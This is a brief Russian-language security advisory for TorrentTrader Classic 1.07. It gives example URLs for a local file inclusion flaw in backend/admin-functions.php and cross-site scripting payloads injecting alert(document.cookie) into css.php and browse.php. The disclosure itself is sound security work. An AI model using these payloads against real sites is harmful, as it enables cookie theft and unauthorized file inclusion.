Программа: TorrentTrader Classic 1.07

Уязвимость позволяет нападающему выполнить произвольный скрипт в контексте безопасности уязвимого сайта или произвольный PHP-сценарий на целевой системе.

Примеры:

Подключение локального файла

backend/admin-functions.php?ss_uri=dd

Межсайтовый скриптинг

pjirc/css.php?color=<script>alert(document.cookie);</script>
browse.php?cat=<script>alert(document.cookie);</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии